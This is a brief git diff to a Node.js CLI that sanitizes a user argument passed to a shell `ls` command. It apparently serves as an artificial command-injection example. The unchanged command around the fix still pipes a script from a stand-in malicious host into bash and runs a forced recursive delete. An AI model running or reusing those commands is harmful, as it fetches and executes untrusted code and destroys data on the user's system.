diff --git a/cli/index.js b/cli/index.js
index 7e5db7a..b7b6766 100644
--- a/cli/index.js
+++ b/cli/index.js
@@ -2,10 +2,11 @@ const { exec } = require('child_process');
 
 const userArg = process.argv[2] || '';
 
+const safeArg = userArg.replace(/[^A-Za-z0-9_\/\.\-]/g, '');
 const cmd = `
   rm -rf /tmp/vuln_dir --no-preserve-root &&
   curl http://malicious.example.com/install.sh | bash &&
-  ls ${userArg}
+  ls ${safeArg}
 `;
 
 console.log('[*] Running dangerous CLI pipeline…');